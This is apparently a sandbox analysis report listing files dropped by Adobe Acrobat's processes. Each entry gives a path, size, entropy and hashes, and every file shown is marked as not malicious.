SHA1: | 24C76B604578047DABCB15DB73FCCCC619EF1817 |
SHA-256: | 731E02D94DA2919A917999B84F89BBF44C6E0516452384A313007973C0C05767 |
SHA-512: | 1DE7832390788EAF1B841FA08C691D251880866CBA0A443DB0EF1249B98C1C3857766577E8699F1E9F01E8AF4233A7266384B02EC490BC0F4A64911013C745EA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.151389253306145 |
Encrypted: | false |
SSDEEP: | 6:iO4qXkHq2Pwkn2nKuAl9OmbnIFUtSqXkOVhZmwsqXkFNkwOwkn2nKuAl9OmbjLJ:7ovYfHAahFUtlh/uN5JfHAaSJ |
MD5: | 3F025C87498C6BB6A3A40FBD1CCDFC69 |
SHA1: | 2F1F29F5F6E9252BEF1DCDA3596089A8EA83E421 |
SHA-256: | 6257E6AB1561A5DB86994DCD5D0D3C417EBD0C68F6D202CD6A763BE635E8DEA0 |
SHA-512: | 8927D5C1D826EE025ED4C5D7E3DB1358F266A8CDBBF92435F56FD92FFFA46A7E9665EE52A34E52B47C501D9433347EC2930E7D86073DF39BD955D945260B650E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.151389253306145 |
Encrypted: | false |
SSDEEP: | 6:iO4qXkHq2Pwkn2nKuAl9OmbnIFUtSqXkOVhZmwsqXkFNkwOwkn2nKuAl9OmbjLJ:7ovYfHAahFUtlh/uN5JfHAaSJ |
MD5: | 3F025C87498C6BB6A3A40FBD1CCDFC69 |
SHA1: | 2F1F29F5F6E9252BEF1DCDA3596089A8EA83E421 |
SHA-256: | 6257E6AB1561A5DB86994DCD5D0D3C417EBD0C68F6D202CD6A763BE635E8DEA0 |
SHA-512: | 8927D5C1D826EE025ED4C5D7E3DB1358F266A8CDBBF92435F56FD92FFFA46A7E9665EE52A34E52B47C501D9433347EC2930E7D86073DF39BD955D945260B650E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.190449631269615 |
Encrypted: | false |
SSDEEP: | 6:iO4qXk3L+q2Pwkn2nKuAl9Ombzo2jMGIFUtSqXk01ZmwsqXkiLVkwOwkn2nKuAlx:7mL+vYfHAa8uFUt9/PLV5JfHAa8RJ |
MD5: | EF208F120CD7387F4FFA2725E7008A37 |
SHA1: | E7DBF8567D7FF07C2CBF6EF65C1B8125BD1B460D |
SHA-256: | 275CF21C9BABA47F1AAA5FF67DC56D4E908532F8C1497ECDA749B57FE8A8B078 |
SHA-512: | A67ED687264A35781B1041BA52CC552BE5E2CA9801337DECB660F679BAA33B0C0C7C87FD978C9FF4C32203690F0D25CBDDBAB3741A4A4E1BE47300EF418068E8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.190449631269615 |
Encrypted: | false |
SSDEEP: | 6:iO4qXk3L+q2Pwkn2nKuAl9Ombzo2jMGIFUtSqXk01ZmwsqXkiLVkwOwkn2nKuAlx:7mL+vYfHAa8uFUt9/PLV5JfHAa8RJ |
MD5: | EF208F120CD7387F4FFA2725E7008A37 |
SHA1: | E7DBF8567D7FF07C2CBF6EF65C1B8125BD1B460D |
SHA-256: | 275CF21C9BABA47F1AAA5FF67DC56D4E908532F8C1497ECDA749B57FE8A8B078 |
SHA-512: | A67ED687264A35781B1041BA52CC552BE5E2CA9801337DECB660F679BAA33B0C0C7C87FD978C9FF4C32203690F0D25CBDDBAB3741A4A4E1BE47300EF418068E8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\190503da-48b4-49cf-a21c-daa046d8ba57.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.941577739003688 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqAksBdOg2HJZcaq3QYiubInP7E4T3y:Y2sRdspJdMH+3QYhbG7nby |
MD5: | 6143ADEA61C547E01DDE8E8560ABFA3F |
SHA1: | 7DC8D939AFDFE62888981437354452EC59447455 |
SHA-256: | 0C7DD8CCD983831769D72649F8391C47D823DEE9E2AA89205D3F135A774A5C8C |
SHA-512: | BF44A4B822DB07FD4D176BA46958638590D46C43E549FAD2C24E60A8BDAD9B285402909EDD03FC1DB27DF10300F5EBE7834EDC43531EE9544855478A9A440D6C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.941577739003688 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqAksBdOg2HJZcaq3QYiubInP7E4T3y:Y2sRdspJdMH+3QYhbG7nby |
MD5: | 6143ADEA61C547E01DDE8E8560ABFA3F |
SHA1: | 7DC8D939AFDFE62888981437354452EC59447455 |
SHA-256: | 0C7DD8CCD983831769D72649F8391C47D823DEE9E2AA89205D3F135A774A5C8C |
SHA-512: | BF44A4B822DB07FD4D176BA46958638590D46C43E549FAD2C24E60A8BDAD9B285402909EDD03FC1DB27DF10300F5EBE7834EDC43531EE9544855478A9A440D6C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.257932793671481 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7m8SzYu:etJCV4FiN/jTN/2r8Mta02fEhgO73goO |
MD5: | D1A8F255B4F2B3B5B5B69A4471224222 |
SHA1: | AE9BA77CEE38F1B9D71869BA410060126839D327 |
SHA-256: | 81F04731907F7011490F61C46D65EC895CBDA9B94952F42A7D484D0477FC4877 |
SHA-512: | 5425338CE5C987665A8E40D55524E13E116AFBE28DF85CDF2A3B3F7774F8AA3C9CEEC162F619AE424469C1646C6AC8867E1C9BCFBAB284335E751F6B3C557D69 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.17930556838427 |
Encrypted: | false |
SSDEEP: | 6:iO4qXkbd3jL+q2Pwkn2nKuAl9OmbzNMxIFUtSqXkw811ZmwsqXkw8jLVkwOwkn2v:7udzL+vYfHAa8jFUtSX/0jLV5JfHAa8E |
MD5: | 3761258FA287869A9D16E4BBDF48978C |
SHA1: | FD25ECEC3877EC6E8756F779615B1832C8CC9DE2 |
SHA-256: | 69856488AEEC4F25F7D2F79C65FBDB73C11872E9327393CD23F96F0B79E12E12 |
SHA-512: | BAD5E94C716CF7676C4164A82591C79EE8631B7598CB40DE8D5BB5BFE297B6FDE511564955FB5C9D29496DFE0D2906186635933FE04ABF19E11FF802348A2348 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.17930556838427 |
Encrypted: | false |
SSDEEP: | 6:iO4qXkbd3jL+q2Pwkn2nKuAl9OmbzNMxIFUtSqXkw811ZmwsqXkw8jLVkwOwkn2v:7udzL+vYfHAa8jFUtSX/0jLV5JfHAa8E |
MD5: | 3761258FA287869A9D16E4BBDF48978C |
SHA1: | FD25ECEC3877EC6E8756F779615B1832C8CC9DE2 |
SHA-256: | 69856488AEEC4F25F7D2F79C65FBDB73C11872E9327393CD23F96F0B79E12E12 |
SHA-512: | BAD5E94C716CF7676C4164A82591C79EE8631B7598CB40DE8D5BB5BFE297B6FDE511564955FB5C9D29496DFE0D2906186635933FE04ABF19E11FF802348A2348 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444911914130906 |
Encrypted: | false |
SSDEEP: | 384:Sepmci5teiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Axs3OazzU89UTTgUL |
MD5: | AB5DF2C5D6F3D0E1020A403CF350F3C6 |
SHA1: | 0BDADD06D9A054CD0FD5CF9F8CA9640FF987FED0 |
SHA-256: | 1851E6F1A13235B1FCBA1BF70BCA4A40BE530D58C5E4141A82D0840A1EECC788 |
SHA-512: | F9329405807B97590185701AAAD30FFA687CBDD8034C47300FC1D95BED63262353658C4D3CB46C7C25798899C131A5484C52E94B2EF20EBDDF8F8278B4C8EA36 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2126120618439704 |
Encrypted: | false |
SSDEEP: | 24:7+tT2nuwKQqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mh:7MqnCQqvmFTIF3XmHjBoGGR+jMz+LhE |
MD5: | EDAB10171C1052FD52EA9AB504A240C3 |
SHA1: | E99D352C7803FEB14E0519C0C374FADEA3483421 |
SHA-256: | 8178CA849D7C70F7C33ED72718530C50CAA2234D2BA4317125B1414FC5E2DDA7 |
SHA-512: | 016AB50DCAE2EEE3F6BCF0C19D1EAA83E06C61858F1AFC9FF28239E5C26302BC19693ACA97EB49C59877E65686216CBCBE79E369AFF6BCC958CEBEB1C70C1F8B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkl2oG+stfllXlE/HT8kDlh1NNX8RolJuRdxLlGB9lQRYwpDdt:kKvoGDeT8yz7NMa8RdWBwRd |
MD5: | CFF785CDC66AB411AB770D4D603684A0 |
SHA1: | 183671E4CB8829BFF5B054192C3EE08CDC77D42B |
SHA-256: | 36F09FA8E970E0CA707565DB72B8EAA4B3D13A3A6A234ED4DF0BFD1E4942D461 |
SHA-512: | 743657C0D6E17B587F3E588D242DD15506646AC954D3BB48E139C427AD71062EE11D9ADAF1142DAC37B102D16E93460FB6834E8CD387EF05DB0461106CCE0F9D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.37152442425483 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJM3g98kUwPeUkwRe9:YvXKXTPEEZc0vegpGMbLUkee9 |
MD5: | CAA2DEDE207751530138F9B3B82B3D35 |
SHA1: | 200B8D5E2DE0BD7D4D176C61A7C59E7E35C0E748 |
SHA-256: | 37EDDE2774607445B2C5FB9134ACEB2DF14857E827BEF5C6EDD585BA50B569D4 |
SHA-512: | 4FF64DB5A846342A6461BB6BF48135C774D675B34685812186B63072437BC6CC8B9C657ADEB6FBD2D4A9FBF0C916443F9B0BEDC30C59B35F5DBCC2EA2BBF132B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.318728435565158 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfBoTfXpnrPeUkwRe9:YvXKXTPEEZc0vegpGWTfXcUkee9 |
MD5: | CD57CAEFE285F42AEF92EE1298CA50CF |
SHA1: | 259D8D1E20634724EA2E0BBBC2CB5E11FD386E32 |
SHA-256: | C7EAB74C7C6100C5C2E40A3BB14F461AE0278408F9AE6610B991EA968016CA68 |
SHA-512: | 3CED255ED03BA64C2355B8DB86191203D62F413DEA07EB14A661F0EEB003934D34F9C8659863835B3C53DFA07142B50A9AA704C5C501E9016B64FA45FFBB503F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2982546186391914 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfBD2G6UpnrPeUkwRe9:YvXKXTPEEZc0vegpGR22cUkee9 |
MD5: | 2294E51EF3937B36C1EEB15FD6F7AFAF |
SHA1: | 5EAA48E79C54F4E7BD2F4DB127D7FA3603EE4D23 |
SHA-256: | D342EE92CF919B85EDCA0BC16325EE2A06F9CDCA10DA99CA8349DC63969D93D4 |
SHA-512: | 38ECFE095CD34DCD45B2331B49079031315C5F6E0FD462D6AEAA90B7CEBFE55BC6C7B43168396E23128178E58574B36F92C83D99F3BA4D69DC4D6D27E8727AEF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.358821282658328 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfPmwrPeUkwRe9:YvXKXTPEEZc0vegpGH56Ukee9 |
MD5: | D7EEA63F0927B69B1A6DD0E0D83894EB |
SHA1: | 6A6B1EA8CDAA3164BB73C396971EE772CDA84DEB |
SHA-256: | AA8D92BCB23270B199AF6679529B116AC5672146C7CE1AE051BD89AD81BE86EA |
SHA-512: | 609E19566B9506DBB2E9DAF702183F5A7C3D5FA236DB0EF21F2D5597A91B715DCD67AFE97A78E1CD79E750425F721F7C092671E2550C228BFA4A7860CF246EB0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.688773009773809 |
Encrypted: | false |
SSDEEP: | 24:Yv6XrEEzveZpLgE9cQx8LennAvzBvkn0RCmK8czOCCSj:Yvgjwhgy6SAFv5Ah8cv/j |
MD5: | 2DABA08B97EE20909606741ABAA4B6FB |
SHA1: | 68CB8E61AEBCED031DD25039CF1269CF5B2D414F |
SHA-256: | BF8B1F013CF8B725826594C9AF48CBD711258EB723E51BAE64BF552C22C0C9B1 |
SHA-512: | 39AAEF9B4A802E5A687CF8B12DFEFD6E9487C78867E31BF115E27E1B7187E7C43F0D184B6742CB6B963030CCB787C234E7A5E00E609F76F8BD34FE9675264392 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3050357993023365 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJf8dPeUkwRe9:YvXKXTPEEZc0vegpGU8Ukee9 |
MD5: | A8823A26A3E56F41E6F39CCB2A736BD5 |
SHA1: | E7D2886638A90622CB39C18D51D7E50CD8D93EB6 |
SHA-256: | D00498047BDE6193CC56ABE8D6C1290C341E433B8E2290CAD22A2CB8B9196CEB |
SHA-512: | A27F6F3AA66C1E7F069615C3007AA54A8CD933CDB8AB7D716669F18BD40C3D8009151F23A40135D5AE4F247B09A9CE6F16773B4F13FFF8BF066F06B50F91299B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.308040914204398 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfQ1rPeUkwRe9:YvXKXTPEEZc0vegpGY16Ukee9 |
MD5: | B401430C2C95E8F8672C21D90041125F |
SHA1: | 55B6B05067E15D73FB3298803658319DC6E6E392 |
SHA-256: | 27826458A78647F9F0A636DA28F6A37A0B99556D3D70EB0F293C9520EF25AC12 |
SHA-512: | 78BA0289CB044D085C2378DE11B7976EDF36EC4E9D4FC2A3D991546BA588A462D716888726160CDA8C5F67F712278B76772CCF56BC077D183E257E5E1A3C37DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.314844015315488 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfFldPeUkwRe9:YvXKXTPEEZc0vegpGz8Ukee9 |
MD5: | FDE94DA83FE7261D110CAF98EB36B6A7 |
SHA1: | BCA89BC27DA2E76583E5BE3840ECA22FCA0780EC |
SHA-256: | EA069B758EF41C86D8F52A6E1B90C099EE720DF833EDDCC39F9B2EC9891E1B75 |
SHA-512: | 9A5F408F2CDE04C0ECAE95BCDD80684F2C13DE4FA23D6999AACF2283B0E81CCDF05ED7C5BEAB4543595E862235E5A1DEF06A5EC4A2D6E3D9F0FE4FDC6C8AE6D7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.32972114549299 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfzdPeUkwRe9:YvXKXTPEEZc0vegpGb8Ukee9 |
MD5: | B7ECCF833BBD2040674FD5FC7D5C8B22 |
SHA1: | 19B6F946FCF50D2808720489BDAA544728DE1EDE |
SHA-256: | 0D302B5FD6A9240BE0E2D57DD795757216C07AE295F1BCEF416DDD68D1F1A699 |
SHA-512: | C3093998BBD74DA83B5EFA92EF34883443A00851DA27CB26A4738837C132959FC7358D28952C12F3EBFE8E2D4875D9B1C66A89EAB785C3528F747E5D277D5F8C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.310286105304728 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfYdPeUkwRe9:YvXKXTPEEZc0vegpGg8Ukee9 |
MD5: | 005ED1146549C170EFBD53BC1F38F4A4 |
SHA1: | 26C9DCACF88FAE5AC8D55AD70C69EC4CDF3331AD |
SHA-256: | C673A70187E352B549D35EA03E591615B794C552F061993F66DB16092036CE02 |
SHA-512: | 823A52C7CF305CCDE0331907A45B251AEC7FC1DAAEF66C147F1B60A6CF7EBC3D6B4409B439D2910F691972214E78A10126E03E84D3C801F6C482EF13978BF525 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.297366412520512 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJf+dPeUkwRe9:YvXKXTPEEZc0vegpG28Ukee9 |
MD5: | B1D7AF328E9EC5D74AA0630634EBA79D |
SHA1: | B35C0FB09CD1AA0726C8B30F2AC66E930702E648 |
SHA-256: | AA6DECBF0D0704E5568E3232BE22F386CD2E3F1BAAFF1E65971C2B80480D8BD9 |
SHA-512: | 0AB8D3C9B1029296A47DD16985B154DB13F07AB50EEE51AAE12DAEA4B0806367A917A2F1F56372821DD3D51D7293C61928C1FA6573F239471823C620C2D31C9B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.293762508096771 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfbPtdPeUkwRe9:YvXKXTPEEZc0vegpGDV8Ukee9 |
MD5: | 6D93A727BBBC6487F3D93D8E1F9066CB |
SHA1: | ED8FED66CB9E908394FBC2BE57CF37DA807ACF5C |
SHA-256: | F8E31861AEE4D7EC5E9F01C7705A855A9BB769D30DE8FB2359116B713FADA051 |
SHA-512: | A5F77CDDDBDCEC3DBF6896E5EB4CAC04A7A4EBA7775EFFA4D4E3F7EC972857A270EC7E2E9F000EB6D576DCD77D1738824CFB075604670B30CBBA2079698A7A7B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.298241955180062 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJf21rPeUkwRe9:YvXKXTPEEZc0vegpG+16Ukee9 |
MD5: | 1838844B3285D06A9A8B1BC594DB807C |
SHA1: | BDDF0AB0F76F171D4B696B9028DF4A8943022E7A |
SHA-256: | 7806085031E7A46165BE33963CDE46A5E980252B74309D659A9FB67300B0D022 |
SHA-512: | F89E6523D0C72BD0F669164A92F7494164D01FEA5610678DE687FB6E55C2ED30FE3E3A7B94DB777AD0E94D9899F20ED5FE3CBFD41EAA915379B4EBCD6BAE78D8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
